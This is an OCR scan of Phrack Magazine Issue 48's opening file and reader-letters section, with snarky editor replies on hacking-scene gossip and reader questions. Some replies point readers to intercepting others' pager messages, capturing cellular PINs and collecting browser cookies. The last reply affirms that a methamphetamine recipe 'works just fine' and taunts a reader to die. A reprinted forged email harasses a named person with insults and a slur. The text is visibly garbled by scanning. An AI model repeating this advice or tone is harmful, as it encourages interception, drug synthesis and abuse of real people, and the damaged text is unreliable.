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~ WARNING! This is a TOP SECRET-MAGIC EYES ONLY document containing 
compartmenalized information essential to the national security of the 
United States. EYES ONLY ACCESS to the material herein is strictly 
limited to personnel possessing MAGIC-12 CLEARANCE LEVEL. Examination 
or use by unauthorized personnel is strictly forbidden and is punishable 
by federal law. ~ 


Yes, it’s the annual issue of Phrack you’ve all been waiting for, 
hopefully you have kept your security clearances current. The delay has 
been a long one, much longer than anyone would have liked. Obviously 
Phrack was never meant to be put out so infrequently, but the 

continual pressures of daily life have taken their toll on yet 

another editor. Yes, those little things like going to work, paying 

the rent and all the other hassles that interfere with putting out a 
large quarterly hobbbyist publication. 


It finally came down to three choices: keep the status quo and put out an 
issue whenever, charge per issue, or get in some new blood. Obviously the 
status quo sucked, and an issue a year was just unacceptable. Charging 
veryone was even more unacceptable, even though "Information wants to 

be $4.95." So, that left bringing in more people to help. 


The hard thing was finding people worth bringing into the fold. 

There was never any shortage of people who wanted to take over the 

whole magazine, but it wasn’t until three of them banded together and 
volunteered to take over the main editorial nightmare that it looked 

like there was a light at the end of the tunnel. Voyager, maintainer of 
the #hack FAQ and editor of CoTNO, RedDragon editor of FeH and 

continual discoverer of Linux root bugs, and Daemon9 admin of InfoNexus and 
text file author extraordinaire, came forward en masse and said, 

"We'll do it." 


Most of you have no idea how hard it is to put out a magazine like Phrack 
with any degree of regularity. You have to track down articles, answer 

tons of mail, read all kinds of news, edit the articles (most of which 

were written with English as a second languge,) maintain the mailing 

list, maintain the WWW site, etc. Hopefully with all the new 

people involved, the new division of labor will allow everyone to 

contribute and put out a magazine in a very timely fashion. (And allow poor 
old Erikb to rest easy knowing the magazine is being taken care of so 

he can devote more time to being a puppet-like stooge of The Man.) 


In any case, you’ve waited long enough...here’s Issue 48. 


READ THE FOLLOWING 


IMPORTANT REGISTRATION INFORMATION 


Corporate/Institutional/Government: If you are a business, 
institution or government agency, or otherwis mployed by, 
contracted to or providing any consultation relating to computers, 
telecommunications or security of any kind to such an entity, this 
information pertains to you. 
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You are instructed to read this agreement and comply with its 
terms and immediately destroy any copies of this publication 
existing in your possession (electronic or otherwise) until 

such a time as you have fulfilled your registration requirements. 
A form to request registration agreements is provided 

at the end of this file. Cost is $100.00 US per user for 
subscription registration. Cost of multi-user licenses will be 
negotiated on a site-by-site basis. 


Individual User: If you are an individual end user whose use 

is not on behalf of a business, organization or government 
agency, you may read and possess copies of Phrack Magazine 

free of charge. You may also distribute this magazine freely 

to any other such hobbyist or computer service provided for 
Similar hobbyists. If you are unsure of your qualifications 

as an individual user, please contact us as we do not wish to 
withhold Phrack from anyone whose occupations are not in conflict 
with our readership. 


Phrack Magazine corporate/institutional/government agreement 


Notice to users ("Company"): READ THE FOLLOWING LEGAL 
AGREEMENT. Company’s use and/or possession of this Magazine is 
conditioned upon compliance by company with the terms of this 
agreement. Any continued use or possession of this Magazine is 
conditioned upon payment by company of the negotiated fee 
specified in a letter of confirmation from Phrack Magazine. 


This magazine may not be distributed by Company to any 
outside corporation, organization or government agency. This 
agreement authorizes Company to use and possess the number of copies 
described in the confirmation letter from Phrack Magazine and for which 
Company has paid Phrack Magazine the negotiated agreement fee. If 
the confirmation letter from Phrack Magazine indicates that Company’s 
agreement is "Corporate-Wide", this agreement will be deemed to cover 
copies duplicated and distributed by Company for use by any additional 
employees of Company during the Term, at no additional charge. This 
agreement will remain in effect for one year from the date of the 
confirmation letter from Phrack Magazine authorizing such continued use 
or such other period as is stated in the confirmation letter (the "Term"). 
If Company does not obtain a confirmation letter and pay the applicable 
agreement fee, Company is in violation of applicable US Copyright laws. 


This Magazine is protected by United States copyright laws and 
international treaty provisions. Company acknowledges that no title to 
the intellectual property in the Magazine is transferred to Company. 
Company further acknowledges that full ownership rights to the Magazine 
will remain the exclusive property of Phrack Magazine and Company will 
not acquire any rights to the Magazine except as expressly set 
forth in this agreement. Company agrees that any copies of the 
Magazine made by Company will contain the same proprietary 
notices which appear in this document. 


In the event of invalidity of any provision of this agreement, 
the parties agree that such invalidity shall not affect the validity 
of the remaining portions of this agreement. 


In no event shall Phrack Magazine be liable for consequential, incidental 


or indirect damages of any kind arising out of the delivery, performance or 
use of the information contained within the copy of this magazine, even 

if Phrack Magazine has been advised of the possibility of such damages. 

In no event will Phrack Magazine’s liability for any claim, whether in 
contract, tort, or any other theory of liability, xceed the agreement f 
paid by Company. 
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This Agreement will be governed by the laws of the State of Texas 


as they are applied to agreements to be entered into and to be performed 


entirely within 


the 


con 


Texas. The United Nations Convention on Contracts for 
International Sale of Goods is specifically disclaimed. 


This Agreement together with any Phrack Magazine 
firmation letter constitute th ntire agreement between 


Company and Phrack Magazine which supersedes any prior agreement, 


inc 


luding any prior agreement from Phrack Magazine, or understanding, 


whether written or oral, relating to the subject matter of this 
Agreement. The terms and conditions of this Agreement shall 


app 
dif 


ly to all orders submitted to Phrack Magazine and shall supersede any 


ferent or additional terms on purchase orders from Company. 


E 


REGISTRATION INFORMATION REQUEST FORM 


We have approximately users. 


Enclosed is §$ 


We desire Phrack Magazine distributed by (Choose one): 


Company: 


Name: Dept: 


Electronic Mail: 
Diskette: (Include size & computer format) 


Address: 


City/State/Province: 
Country/Postal Code: 


Telephone: Fax: 


Send to: 


Phrack Magazine 


603 


W. 13th #1A-278 


Austin, TX 78701 


Enjoy the magazine. It is for and by the hacking community. Period. 


Editors : Voyager, ReDragon, Daemon9 


ailboy : Erik Bloodaxe 
3L33t : Mudge (See Below) 
Short : Security Dynamics (NSDQ:SDTI) (See Above) 
Myers-Briggs : ENTJ 
News : Datastream Cowboy 
Prison Consultants : Co / Dec, Tcon 
Sick Sexy Horror Chick : Poppy Z. Brite 


Thanks To : Cherokee, Damien Thorn, Boss Hogg, StaTiC, 
Sendai, Steve Fleming, The Guild 
Obi-1, Kwoody, Leper Messiah, Ace 
SevenUp, Logik Bomb, Wile Coyote 
Special Thanks To : Everyone for being patient 
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with the following key : (Not that we use PGP or encourage its 
use or anything. Heavens no. That would be politically-incorrect. 
Maybe someon lse is decrypting our mail for us on another machine 


that isn’t used for Phrack publication. Yeah, that’s it. >) ) 


** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED ** 


Phrack goes out plaintext...you certainly can subscribe in plaintext. 


psieecnaeion BEGIN PGP PUBLIC KEY BLOCK--—---— 
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Wy 


The culture of criminal hackers seems to glorify behavior which would be 
classified as sociopathic or frankly psychotic." 
(Mich Kabay, director of education, NCSA, NCSA News, June 1996) 


"The Greek word /diarrhein,’ which means ’to flow through,’ describes 
diarrhea very well." 
(Gross-ology by Sylvia Branzei, Planet Dexter, 1996) 


"Fuck you, clown!" 
(Thee Joker, Defcon IV, July 28, 1996) 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 2 of 18 


Phrack Loopback 


This is a response to the letter from KoV included in "Line Noise 
Part I" from Phrack #47. After reading this open letter, I nearly died of 
laughter. The inaccuracies of KoV’s story were numerous and comical. 
However, from the way KoV presented themselves, they are acting as if 
it was their BBS network and a government conspiracy that has gotten 
them into trouble. As a result, they will appear to many as a 
wrongfully persecuted group of computer users. 


Apparently, KoV likes to fancy themselves as a group that 
spread "open-minded" and "Sociopolitical" beliefs through their BBS 
network, KoVNet. They claim that they "questioned [the] authority" of 
those who "tried to oppress [their] free-thinking minds." They then 
state that this caused the "AmerikKKan" government to monitor their 
actions, "stalk [them] in public places", and and attempt to destroy 
them "from the moment of KoV’s conception." 


This is ridiculous. First off, their BBS network was not 

enough to cause the government to stalk them in public. If a BBS 

network that contains disdain for the American government justifies 
the stalking of its users, then NUMEROUS people in this country are 
currently being followed in public. Therefore, KoV’s claim about 
t 
t 


heir threatening BBS network is an attempt to make 
hemselves look bigger and more important than they were. 


Now, let us look at the real reason they are facing legal 


actions. KoV is blaming "false accusations from a local university" 
for their troubles. However, the accusations are not false and 
after you read what led them to be caught, you will reallize that KoV 


was never a threat to the government. 


I do not know exactly how many universities they hacked. 
However, if it is one local university as they claim, it is Skidmore 
in Saratoga Springs NY, the university which I attend. I myself have played 
around with Skidmore’s computers and do not feel any loyalty or 
patriotism to my school. Therefore, it is not a grudge I am harboring 
against KoV for hacking Skidmore’s system that is causing me to write 
this. It is merely the fact that KoV is distorting the truth in an 


attempt to turn themselves into martyrs. 


Personally, I cannot blame anyone for breaking into Skidmore’s 
system. Since Skidmore was relatively new to the Internet, their 
security was very lax making it very easy to explore and play around 
with the system. If KoV had any knowledge whatsoever, they would not have 
been caught or even detected by Skidmore. It was their egos and lack 
of knowledge that led to their investigation. I myself saw with my 
own eyes how they were detected. 


The system that was hacked by KoV was wopr.skidmore.edu. 
Well, one day I took a look at the system logs for WOPR and saw "root 
login from [some out of domain ip address]" standing out quite well. 
If KoV was really so Knowledgable and dangerous, wouldn’t they know how to 
edit system logs? However, they did not which shows KoV is another 
xample of people who managed to obtain root access and did not know 
what to do with it. 


Some people would think, "Big deal! Just because they didn’t 
edit the system logs does not mean that they could ever be linked to 
the crime." This is very true. However, this would have required Kov 
to keep their mouths shut about the incident. Yet, they did not. 
Apparently, Lord Valgamon made a post to some of the BBS networks he 
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frequented where he showed off about hacking Skidmore and told 
everyone how he did it. 


This hurt KoV greatly. As a result, a narc on the BBS network 
alerted CERT about Lord Valgamon’s claims who, in turn, reported the 
incident to Skidmore. This caused Skidmore to now have a name, though 
anonymous, to apply to the break in. Consequently, the proper 
authorities became involved and they began to track down Lord Valgamon 
on the BBS networks. 


From the above facts, you can probably guess that the 
"AmeriKkKKan" government would never have a special interest in KoVv 
because they are the typical stereotype of an "ELiTE MODeM d00d." If 
Lord Valgamon and KoV had kept their mouths shut about the incident, 
they never would have been caught. However, KoV needed to tell their 
ELITE BBS scene how bad-ass they were and, as a result, their 
bad-asses are getting spanked hard. 


KoV had not done any crime or brought up any controversy 
against the government. Their only crime was that they were stupid. 
I understand that KoV is now asking for the support of the h/p and 
political groups in the scene. However, I would not recomend anyone 
to give them support. There was no government conspiracy against KoV 
and everything that has happened to them was brought on by their own 


stupidity. Do not turn a bunch of egotistical and immature criminals 
into martyrs. I will end this with the same words KoV started their 
letter with: "Don’t believe the hype." Public Enemy. 

Sincerely, 


Mr. Sandman 


[ Wow. Well, we always like to hear all sides to any story, and each 
time something gets published that gets under someon lse’s skin, we 
inevitably do. Thanks for writing! ] 


Hello! 


Let me tell some words about myself. Computers and 
telecommunications take quite important place in my life. In 
past I worked as a programmer, system administrator and finally 
I ran my own business selling computer hardware (now I have 
closed this business because I have lost my interest for trade 
and due to some financial reasons). I owned my own BBS for 
several years but now I have it shut down because I do not want 
support lamers leeching files 2-3 years old and having no ideas 
what email is. Now almost every day I spent many hours reading 
Internet newsgroups, mainly dedicated to phreaking/hacking. 


A friend of mine, gave me some Phrack issues (newest was #42 of 1993). 
I have read them and like them very much. 


If it is possible, please drop me a line how could I subscribe 
to Phrack magazine. If you do, please encrypt your reply and 
send it via anonymous remailer, because now Russian government 
begun to control email messages very thoroughtly. 


I have private information from friend Internet provider about 
the FAPSI (Federal Agency of Government Communications and 
Information -- some form of Russian NSA/FCC hybrid formed from 
ex-KGB agents) actions aimed to control data passed through 
Internet channels in Russia. FAPSI ordered all Internet 
providers in St.Petersburg to install software which task will 
be to copy all messages addressed to/from persons which FAPSI 
interested in and to scan for some keywords specified by FAPSI. 
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Providers will get their licences for providing communication 
service only after installing such spy software. There is a 
rumour that FAPSI has installed hidden microphones (bugs) in 
providers’ offices to control any "illegal" activity (free 
information exchange always was illegal in USSR/Russia). I say 
"rumour" because I have heared it only from one trusted source, 
other information came from several trusted sources 
simultaneously. 


BIW, using a PGP is illegal in Russia too, because FAPSI can not 
break the PGP-encrypted messages. 


If you find information written above meaningful, you may use it 
in your own discretion but with some precautions -- remember 
that country I live in have barbaric laws and Russian 
Police/Security Services have _absolute_ power to put in jail 
anyone they want without any court or warrant. 


[ Normally I strip out all anonymous remailers, because they 
interfere with the bulk mailing process, bounce mail, and generally 
screw things up...however, there are always exceptions. 


The FAPSI requirements are extremely interesting to hear about. It 
certainly makes sense, and I fear that our country is likewise heading 
towards that goal. 


If you get the chance, you ought to write more about being a hacker 
in your country, since I am sure the rest of the world would be 
fascinated by it. ] 


Greetings... 
I looking for just a nibble of information... 


When one logs into a remote system and gets login and passwords questions 
how does one write a program to crack a password... 


I’m sure that is not an easy question or even a nibble perhaps a byte... 


Seeking Info, 
SPY 


{ Well, I can’t tell you how to write a program to crack passwords 
without knowing what kind of system you want to crack passwords for. 


I can’t tell you how to say "Where is the bathroom" in a foreign 
language without first knowing what language you want to say it in. 


If you are talking about UNIX passwords, there are already numerous 
programs written to "crack" passwords. I would suggest you go poke around 
and look for programs like "crack" or "killer cracker." If you 

can’t find reference to either of these on the net, then you really 

ought to consider finding a new hobby. ] 


Wuzup! I have a pager that I don’t use anymore because I can’t afford the 
bill. So I was wondering if there is anyway I can hook-up my pager for free 
without going through a paging service. 


[ Depending upon the pager, you can possibly change or add capcodes through 
special programming software. Almost all Motorola pagers allow you to do 
this. 


This won’t allow you to "really" get fr service, but you can piggy back 
on top of some known person’s pager service (or just intercept their pages.) 
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The only way to get "free" service is to reactivate the pager’s current 
capcode in the paging system from the local provider who owns the frequency 
the pager is crystaled for. ] 


I was browsing through Issue 47, and saw something that had caught 
my eye. 


""THE HACKER WAR -- LOD vs MOD" 


This t-shirt chronicles the infamous "Hacker War" between rival 
groups The Legion of Doom and The Masters of Destruction. The front 
of the shirt displays a flight map of the various battle-sites 

hit by MOD and tracked by LOD. The back of the shirt 

has a detailed timeline of the key dates in the conflict, and 

a rather ironic quote from an MOD member." 


A few weeks ago, I read the book Masters of Deception, a book about 
the "war". Wasn’t the name of the rival group Masters of Deception? 

I assume that Erik would know, he appeared to be the main "villain" in 
this version of the story. Any response would be appreciated. 


[ I was the villain? Well corn my pone. 


In any case, you should always take everything you read with a grain of 
salt. In my opinion, the book was a piece of shit. Since many of the 
MOD members decided to viciously attack the author, Josh Quittner, posing 
as the ILF, I can only assume that they felt likewise. 


So you decide for yourself about all that. Oh, and buy the damn 
t-shirt. http://www.fc.net/phrack/shirts.html ] 


Hi Can you teach me to be a hacker i think that that would be cool so what do 
you think can you teach me to be a hacker and to be cool you are one of the 
biggest hackers in the world 


[ No, I’m afraid as one of the biggest hackers in the world, I’m far too 
important to expend any energy on the likes of you. 


Now go back to your PlayStation and get better at Toshinden. ] 


Where culd i find some zipped red box tones? Or blue box. 
CyberOptik 


[ Make your own tones with the Blue Beep program. 


Follow some of the links from the Phrack Home page, and you should 
find this program on any number of sites. ] 


Hallo, din Gamle rn!! 
(Norwegian for: Hello, you Old Eagle!! 
(rn(Eagle) is pronounced like: earn ) 


(direct.translated.) 
End of Norw. lesson. 


This is a question from one viking to another; I am a newbie in the H/P 
division so I spend my days(and nights!) dwnloading all i can find about the 
subject. But I do have some problems with the cellular phone system over 
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here, NMT 900. Which your system AMPS have stolen all the good parts from! 
Untill last year i could program my cellular phone, Ericsson NH 99, by 
programming and switching the 27c512 prom. But now the norwegian 
telecompany Telenor Mobil has inserted pin codes, i.e. if my cellular phone 
number used to be 12 34 56 78 (we have 8 digits), then my phone number now 
has changed to 12 34 56 78 XX X. Where the 3 last digits are unknown to the 
owner of the phone. 


I do have programs and cables for programming the phone with all 8+3 digits, 
but then I have to know the 3 digits, the pin code, and I do NOT know how 

to download them from the cellular traffic going around my place. Can you 
help me beat the system? How do I dwnload the pin code???? I read that they 
are going to use the same system i the N.Y. area within this year, so someone 
is going to ask you these qst. sooner or later. Be prepared! Or is my qst. 
old news? Maybe everyone knows how to do this? Exept the norwegian newbie.... 


Vennlig hilsen 
(thats:Best regards) 


Stian(Mr.Phonee) Engerud 


[ I’m not sure I understand how the last 3 digits can be unknown to the 
owner of the phone. If your number changes, then obviously you have to 
know the new number. Are you sure this isn’t just a touch-tone PIN 
entered in when you use phone, like systems over here in the states? 


If it is, then you’1l still need some kind of ESN reader, or other means 
to decode the reverse channel, and a 900 mhz-capable radio and a touch-tone 
decoder to grab the PINS as well. It’s incredibly annoying. 


On another note, I thought Telenor Mobil had AMPS, ETACS and GSM systems 
in place. Have they upgraded their ETACS systems as well? If not, 
use those. ] 


From: zadox@mindspring.com (Ron Zalkind) 
Subject: Phrack Magazine: Strategic Marketing Partnership 


I’m one of the principals of a new Internet-based, second-generation, 
Information Technology service. This new Internet service debuted last week 
at the Culpepper Forum in Atlanta. I’d like to propose a strategic marketing 
partnership with Phrack Magazine. This proposal will spell out what it is 
our service does (including a product demo), how we think a partnership with 
Phrack Magazine might work, and how we can all increase profits by doing so. 
Please reply to this E-mail with the name and E-mail address of the 
‘director of online strategy’, or the ’circulation director’, for Phrack 
Magazine. Thank you. 


Ron Zalkind, President 
R.E. Zalkind & Co. Inc. 
Voice: 770-518-1600 
Fax: 770-642-0802 
E-mail: zadox@mindspring.com (Ron Zalkind) 
Ron Zalkind 


[ WOW! I can’t wait to hook up with THESE incredibly savvy people 


so Phrack can dramatically increase our profits. Let’s see, if we 
make any money, we’ll s a 100% increase! It’s a no-lose 
Situation. 


Man, I hate Internet mass-mailers. Don’t these people attempt to qualify 
their leads even a LITTLE? Strategic Marketing Opportunities with 
free computer hacker magazines? Ron? Hello? ] 
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First of all, great work on the ’zine all these years, hope to see 48 
soon. 


I have an article from "Airman" magazine (I believe it was the April 
1996 issue), the US Air Force magazine given to military members. It 
details the efforts of AFOSI (Air Force Office of Special Investigations) 
to prevent hackers from breaking in to military computers. Considering 
it’s coming from the military, it’s not too badly written (the author 
actually knew the difference between "crackers" and "hackers"). I don’t 
have a scanner, but I’d be more than willing to snail mail it to you. I 
just wanted to check and see if you guys already had it of not. If you 
don’t, let me know, and I’1l get it to you ASAP. 


Keep up the good work.... 


[ We would definately like to s the text from this article. Please 
forward it! 


In fact, if any of you readers ever come across ANYTHING you think is cool, 
email it to us, or snail mail it. We love getting mail. 
We will print anything cool. (And a lot of lame things too!) 


Just stop sending us credit histories and password files. ro ae 


need access to w.gov XXX now 
[ w.gov? Uh, ok, let’s see: 
Reserved Domain (W-GOV-DOM) 
Domain Name: W.GOV 
Administrative Contact, Technical Contact, Zone Contact: 
Internet Assigned Numbers Authority (IANA) iana@isi.edu 
(310) 822-1511 

Record last updated on 02-Dec-93. 


Record created on 01-Dec-93. 


Do you know what this means? Duh. ] 


From: health@moneyworld.com 
Subject: Scientific Discoveries Minimize Aging (DHEA) 


http://dhea.natureplus.com 


Take advantage of the amazing benefits of DHEA. In the search for the 
FOUNTAIN OF YOUTH, DHEA is a must README. People, age 70, feeling and 
acting 25. 


Read the medical research at http://dhea.natureplus.com .A quote from 
an article published by the New York Academy of Science written by Dr. 
S.S.C.YEN; 
"DHEA in appropriate replacement doses appears to have remedial effects 
with respect to its ability to induce an anabolic growth factor, increase 
muscle strength and lean body mass, activate immune function, and enhance 
quality of life in aging men and women, with no significant adverse effects." 


Regain the eye of the tiger! Don’t wait ! Click on: http://dhea.natureplus.com 


To terminate from the Health Catalog, Reply to health@moneyworld.com with 
"remove" in the subject field. Bob Williams 206-269-0846 
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P.S. You will find a full line of Vitamin, Supplements and OTC Health 
Catalog at http://natureplus.com. 


[ Yet another Mass mailing! How many lame mailing lists are we on? 
You have to wonder about these things. 


But how angry can one get, knowing that DHEA is the FOUNTAIN OF YOUTH! 
I need to get me some of that. A little DHEA, a little GHB, a little 
DMT, and you’ll look younger, feel younger, and have the brain of 

a two year old. 


And besides, Jesus loves acronyms. ] 


Do you listen to 2nur radio? If so have you ever heard a band named 
SOYLENT GREEN or GOITER on any of their shows? 

please email me back 

thanx, 

Nick 


5 


[ Nick, I hate to break it to you, but: 


SOYLENT GREEN IS PEOPLE!!! 
IT’S PEOPLE! !!!1) ] 


From: Pete Shipley <shipley@dis.org> 

To: best-of-security@suburbia.org, cert@cert.org, cudigest@sun.soci.niu.edu, 
daddict@1l5.com, dc-stuff@fc.net, dtangent@defcon.org, 
emmanuel@2600.com, grayarea@gti.gti.net, letters@2600.com, 
mycroft@fish.com, phrack@freeside.fc.net, phrack@well.sf.ca.us, 
proff@suburbia.org, root@iss.net, root@lOpht.com, root@lod.com, 
root@newhackcity.com, spaf@cs.purdue.edu, strat@uu.net, 
will@command.com.inter.net, zen@fish.com 

Subject: Shipley owned, hacked and thrashed 


Please distribute this letter freely: 


his posting is being made from dis.org, and this is not forged e-mail. 
ven though this mail is coming from Peter Shipley’s account, I am not him. 


HH 


Who am I? 


That is unimportant except to say that I cannot take anymore of the 
"DoC" crowd’s BULLSHIT. I would like to raise an issue with them, mostly 
(but not all related to the incident at defcon). 


To you drunken losers at defcon who had to fuck with Netta’s speech (DoC 

on hold here for a second, it wasn’t just them): If you didn’t want to hear 
Netta’s speech (though in your opinion it may be monotone, boring or even 
wrong) you DIDN’T HAVE TO STAY AND LISTEN TO IT. There were some people that 
WANTED to listen to the speech, but you all had to act like POMPOUS ELITIST 
ASSES. How different are you now from a government that would like to 
enforce censorship upon it’s own people? 


All I can say is "getbacks are a bitch". A few things to consider: 


ibe Shipley is an utter tool. His whole appearance is a front. If he’s 
such an awesome security specialist then why was he so easily owned? Also 

I bring into question some of the motives he has for harassing Netta Gilboa. 
Her boyfriend (who is currenlty in jail) was known for continually hacking 
(yes CONTINUALLY hacking) Peter Shipley. I know this because I spoke with 
Chris (n00gz) many times and was aware of this fact. 


In my opinion Petey, anyone that is foolish enough to hire you to secure their 
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systems are idiots; whether it’s the military, government, industry, a 
business -—- they should all just ask for their money back. You are a discredit 
to your profession. 


2. Shipley is a coward. Only cowards attack people weaker than them 
but back away from a confrontation with someone of equal size or power. 
Careful Peter next time don’t piss off Bootleg, he might hurt that pretty 
boy face of yours (though I admit, I would like to see it) 


3%. Hackman was a gob of shit. Peter Shipley has come to know his true 
calling in life now (to wit: Webmaster). 


4. The fangs make you look like a homo. Maybe you are (nothing against 
them actually, just stating a fact). 


Shipley, seven, (ayoung, where’s your piglet account?). Get a fucking life. 
Maybe instead of contstantly going around "Searching for intelligent life" 
perhaps you should stay home and secure your own systems. You are all owned, 


now don’t you feel stupid? You should. You are. 


DIS.ORG == DISORGANIZED. 


—-— galf@upt 
{ This is almost funny. 
Notice I said, almost. 


You have to admit though, Shipley always comes with some damn fine 
women in tow. Oh the things I did in my mind to that blonde... 


Something tells me that the author of this forged message could use a lot 
of Shipley hand-me-downs: Women, contracts, references, etc... ] 


Hey, I just watched the movie Hackers, and I was just curious to know if They 
used you and the LOD to models the characters in the movie after? Alot of the 
handles, and choice phrases they used sounded awfully Farmiliar with what 
went on, or at least what the book said went on. 


Meds: } 


[ Actually, meds, the screenwriter hung around with "MOD" and other people from 
the New York hack scene and picked up some pointers, and then used 
people like Dead Lord and Emmanuel Goldstein as technical assistants. 


Or something like that. 


Please, don’t ever associate "LOD" with this piece of shit again. :) ] 


A lot of people have read the article about Joe Engressia and his time in 
Memphis where he was arrested by the police and banned from his dream of 
working on phone lines. Well, at the time when he was living on Union 
avenue, my mother was in charge of payroll, hiring and the like at a local 
switchboard. This was back in 1972 when the phone system was less of the 
fuqup it is today. Well, a friend of my mother’s taught Mr. Engressia how to 


cook and other related houshold things despite his handicap. Shortly after 
or before this, (I am unsure) he was arrested by the police. I think this 
was also about the time the interview was made. Anyway, the local phone 
companies would not touch him, not even to give him service. My mother, 
after talking with him decided to hire him as a phone consultant. (Her 
opinion of his was that "He was so brilliant, it was scary, I mean REALLY 
scary.") She though he was a great "kid" (22 at the time) and was the best 


consultant that they had. He worked there for thr years before moving. 
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The last my mother heard was that he was living in a Denver high rise 
working as a consultant to a corporation or something out there. I only just 
started talking with my parents about this today, but I am sure that they 
will tell me more of him. 


Oh, and my father was good friends of Joe too, he and Joe were Ham Radio 
operators here in Memphis and my father still phreaks on them so I am sure 
that Mr. Engressia does too. Anyway, my father is teaching me how to hack, 
and my mother is teaching me how to phreak, but she only knows a little of 
outdated info and wants to get in touch with Joe. If anyone, ANYONE has any 
information about Joe, or if somehow this article gets to Joe, please let m 
know at the following e-mail address: 

Kormed@aol.com. 


[ We used to call Joe on conferences a long time ago. I could probably 
dig his contact information up, but I really doubt he’d appreciate his 
number being published in Phrack. 


Hell, if your parents are teaching you how to hack & phreak, then certainly 
they can find Joe. He was always listed in Directory Assistance when 
we tracked him down years back. 


Have you even really looked for him?  ] 


quick question For Bloodaxe. 

Ok, I know you probably get this Alot,but I just have to ask?... 

Did you Really Date Christina Applegate? 

had to ask, 

[ Man, now that is a rumor that I would love to have started myself. 
No. Never dated her, never met her, never talked to her, never 


had any contact whatsoever. Spent some time holding up some of her 
posters with one hand, but that’s about it. ] 


do you have any info on stealing magic cookies ?? 


[ No, but I can trade you these magic beans for your cow. If you plant 
them they will grow high into the sky, towards the castle in the clouds 
where the giant lives with the talking harp and the goose that lays the 
golden eggs. 


Go read some of the WWW Security Lists, if you’re talking about what 

I think you are. There are also javascript routines that collect 
navigator cookies from clients hitting your page. After briefly looking 
around, I can’t find the specific sites to snarf them from. Go doa 
webcrawler search for WWW security or javascript security. ] 


Dear Phracks - I’m a Free Journalist from Germany and I’m going to write 
an articel about ISDN and the possible danger which might happen to a 
company etc. getting hacked by some agnets, spies etc. from other 
countries. So I’m looking for indos about ISDN-Viruses, Hackers and 
background infos. 


Can you help me? 
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[ Wow, a "Free Journalist." I thought that pesky national socialist party 
imprisoned all you guys. 


ISDN Viruses are quite possibly the worst thing to happen to computing 
since the creation of the Cellular Trojan Horse. Basically, these viruses 
travel over the wires using the X.224 transport protocol, and seize the 

D channel using 90.931. All SS7 data sent over the D channel is quickly 
compromized and re-routed to different signal transfer points, causing 
massive ANI Failure over th ntire routing mesh. 


Rumor has it that the Internet Liberation Front was behind these viruses 
with heavy investement coming from the German Bundesnachrichtendienst’s 
Project Rahab. These hackers were paid with AT&T calling cards encoded 
with a polymorphic encryption scheme, and cocaine. 


You can quote me on this. ] 


Well, i wanna make an offer, and a nice deal. 

i am n editor in an H/P/C magazine of HFA ( universal H/P/C 
GLOUP:) 

well, what i wanna offer is a joining both of the papers 
2gether, OR! u want more subscribes, we’ll publish ya, 

but adding 1 article from ya’r paper, saying from where it is. 
so, if we can make this deal, contact me asap! 

10x. 


[ Let me see if I understand this, your "universal H/P/C group" has 
a magazine, and wants to do "Phrack" the great honor of merging 


with us, or printing our articles? Wow. What a deal. You mean 
by linking up with you guys, we will hit a greater audience 
"universally?" 


So, merging our roughly 10,000 direct email subscribers, and a roughly 
75,000 more WWW or misc. readers, adding in your readers, that should 
bring us up to 85,001 readers! Universally! FAN-FUCKING-TASTIC! 


Are there so many rocks for you people to crawl out from under? 
Sheesh! ] 


Hello, 
I have a need for a network sniffer. Specifically, one that will 
sniff IEEE-802.3 packets and TCP/IP packets. Any leads? 


[ Well, gee, are there network sniffers that won’t? 


Go do an archie search for tcpdump. ] 


I was just strolling by you page: http://freeside.com/phrack.html, 
and found my link "Showgirl Video" (link to vegaslive.com). 


I am the creator and webmaster for the site. If I can ever be 
of assistance to you let me know. 


We are one of the few sites in the world that has a live stage and 
live 1 on 1 conferencing in one place. 


JOAN: «s 


2.txt Wed Apr 26 09:43:41 2017 11 


[ Ya know, every time I’m in Vegas I make it out to Showgirl Video with 
a bucket of quarters and a healthy dose of bad intent. I have to 
congratulate you guys for going on-line. I love it when two of 
my favorite things come together (smut and computers). 


Unfortunately, The Vegaslive site is kind of pricey. You guys seriously 
need a flat fee. I suggest you look at a SUPURB site: 
http://www.peepshow.com 


That place has a flat fee, all you can eat pricing structure, the way 


God meant it to be. Take note, and follow suit. ] 
I have a Mitsubishi MT9 (MT-1097FOR6A) ..I program the NAM with the 
passw: 2697435 ...I need the passw to have access to SCAN or TAC 
function ...please, help me! 
Thank 
Regards 
NCG] 

I’m not familiar with that phone, but I’d start off looking through 


Dr. Who’s archive of cellular info at: 
http://www.1l0pht.com/radiophone 


If what you are looking for isn’t there, there might be a link to 
somewhere that has it. ] 


my name is azreal! I am also known as the angel of death. why did you sell 
out to the feds back when you running comsec. i think phiber optick was a 
great guy and i would have been glad to work with a legend. do you know his 
e-mail adress 

azreal 


[ Azrael? The Angel of Death? I thought Azrael was Gargamel’s annoying cat. 


But to answer your question, I sold out to the man ages ago for money. 
Pure and simple. Once you hit puberty, you might have a need for cash. 
Once mommie sends you off to college, you might need it even more. And 
in the distant future, when you get out on your own, you will really 
know. 


Yes, phiber is swell. There have been good pictures of him in many 
national magazines. Try not to get the pages stuck together. 
And, yes, I do know his email address. Thanks for asking! ] 


From: prodigy.com (MR MARK P DOLESH) 


How do you hack? 


[ Very carefully. ] 


Did you ever write a edition that deals with breaking the screensavers 
code? If so which one? How about breking the Win95 password. You know 
the one that allows you into Win95? 


[ We pass all articles about breaking Windows Screen Savers on to 
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the more technical forum at 2600 magazine. 


To disable the Win95 password, install Linux. ] 


A phriend of mine showed me your sight a few days ago at his house...I 
thought it was pretty cool. I dloaded a few issues and stuff to check 
out...I haven’t been on the internet to long so I’m still trying to phined 
more stuff that interest me, and I would like to set up my own page like 
that but my account is thru the school...Is there anyway around that? So 
it can be like border line legal? How underground can one go??? If you 
still have the file on where the line is please send them...Thanks. 


[ Your account is through your school, but you are looking for a way around 
that? Hmmm...let me see. I’m just going to throw out something wild 
and crazy, but, what the hell: Maybe, get another account through 
another Internet provider? I know, it’s just too outlandish. Forgive 
me for being so zany. 


How underground can you really go? I used to have that file you are looking 
for, but I was so underground at the time, it got soiled with mud and 
disintegrated, eventually polluting the water table, and was ultimately 
drank by the city of Pasadena, Texas. ] 


In regards to volume one ,issue four , Phile #8 of 11 
This shit has got to be a joke , I tryed to make some and 
Was a great dissapointment ???? 


[ The meth recipe works just fine. Obviously you DIDN’T try to make it. 
If you feel like a REAL MORON, look at the cat recipe in the line noise 
section of this issue. Stay up for a week, go into deep amphetamine 
psychosis and die! Woo Woo! ] 


